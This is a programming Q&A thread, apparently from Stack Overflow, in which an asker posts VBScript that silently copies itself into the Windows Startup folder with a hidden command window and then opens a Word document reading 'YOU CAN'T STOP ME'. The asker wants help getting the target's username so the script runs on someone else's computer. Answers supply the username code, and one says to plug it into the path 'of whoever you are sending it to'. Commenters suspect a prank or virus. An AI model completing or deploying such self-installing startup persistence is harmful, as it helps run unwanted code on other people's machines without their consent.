# VBS copy itself into start-up folder

Tags: vba, vbscript

This is my code:
I am trying to help out my friend.
Most of the code works, but I don't know how to make the first part of the code get the person's username. (My UserName)

```
   set wshShell  = CreateObject("Wscript.Shell")

   sSourceFile   = "C:\My UserName\Downloads\Word\Word.VBS"
   sTargetFolder = "C:\My UserName\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

   sCmd = "%comspec% /c copy """ & sSourceFile & """ """ & sTargetFolder & """ /Y"

   wshShell.Run sCmd, 0, True


   Set objWord = CreateObject("Word.Application")

   objWord.Visible = True
   Set objDoc = objWord.Documents.Add()
   Set objSelection = objWord.Selection

   objSelection.Font.Name = "Calibri"
   objSelection.Font.Size = "9"
   objSelection.TypeText "===================================================================================================="
   objSelection.TypeParagraph()

   objSelection.Font.Name = "Calibri"
   objSelection.Font.Size = "12"
   objSelection.TypeText "___________________________________________________________________________"
   objSelection.TypeParagraph()

   objSelection.Font.Name = "Algerian"
   objSelection.Font.Size = "77"
   objSelection.TypeText "EQUACHALK"
   objSelection.TypeParagraph()

   objSelection.Font.Name = "Calibri"
   objSelection.Font.Size = "12"
   objSelection.TypeText "--------------------------------------------------------------------------------------------------------------------------"
   objSelection.TypeParagraph()

   objSelection.Font.Name = "Calibri"
   objSelection.Font.Size = "12"
   objSelection.TypeText "--------------------------------------------------------------------------------------------------------------------------"
   objSelection.TypeParagraph()

   objSelection.Font.Name = "Algerian"
   objSelection.Font.Size = "49"
   objSelection.TypeText "YOU CAN'T STOP ME"
   objSelection.TypeParagraph()

   objSelection.Font.Name = "Calibri"
   objSelection.Font.Size = "12"
   objSelection.TypeText "___________________________________________________________________________"
   objSelection.TypeParagraph()

   objSelection.Font.Name = "Calibri"
   objSelection.Font.Size = "9"
   objSelection.TypeText "===================================================================================================="
   objSelection.TypeParagraph()
```

How do I make this code copy itself into the Start Menu of the user's computer?

Thank You For Helping Me!

Answer (score 0, accepted):

`Application.UserName` will give you the name that the user entered when (s)he installed the Office suite, but that's probably not what you want.

`Environ$("UserName")` will get the username from the Windows environment variable. If it's set.

This is longer and more complex, but will also return the user name (courtesy of an example by Microsoft).

```
 ' Declare for call to mpr.dll.
   Declare Function WNetGetUser Lib "mpr.dll" _
      Alias "WNetGetUserA" (ByVal lpName As String, _
      ByVal lpUserName As String, lpnLength As Long) As Long

   Const NoError = 0       'The Function call was successful

   Sub GetUserName()

      ' Buffer size for the return string.
      Const lpnLength As Integer = 255

      ' Get return buffer space.
      Dim status As Integer

      ' For getting user information.
      Dim lpName, lpUserName As String

      ' Assign the buffer size constant to lpUserName.
      lpUserName = Space$(lpnLength + 1)

      ' Get the log-on name of the person using product.
      status = WNetGetUser(lpName, lpUserName, lpnLength)

      ' See whether error occurred.
      If status = NoError Then
         ' This line removes the null character. Strings in C are null-
         ' terminated. Strings in Visual Basic are not null-terminated.
         ' The null character must be removed from the C strings to be used
         ' cleanly in Visual Basic.
         lpUserName = Left$(lpUserName, InStr(lpUserName, Chr(0)) - 1)
      Else

         ' An error occurred.
         MsgBox "Unable to get the name."
         End
      End If

      ' Display the name of the person logged on to the machine.
      MsgBox "The person logged on this machine is: " & lpUserName

   End Sub
```

Once you have the user's ID, you can work on the rest of it. I'm not exactly sure what you mean by "make this code copy itself into the Start Menu". You can't really have VBA code just sitting in a file to be executed. It needs to be attached to some sort of Office host application.

If you want to insert the Word doc (or a shortcut to it) in the start menu you can do some searching on creating a start menu shortcut, and ask a question about that if you hit a wall.

Comment: Judging by the context, I'm pretty sure "make this code copy itself into the Start Menu" means autorun on startup.  I'm guessing this is meant as either a prank (more probable given in the content) or something borderline malicious.

Answer (score 0):

`Set wshShell = CreateObject( "WScript.Shell" )`

`strUserName = wshShell.ExpandEnvironmentStrings( "%USERNAME%" )`

`WScript.Echo "User Name: " & strUserName`

This code should help you get the username of whoever you are sending it to or something. Judging by your code, you want to put this at the start and instead of My Username you would put strUserName in there.

Comment: But why are you creating pranks and viruses.

Comment: take the spaces out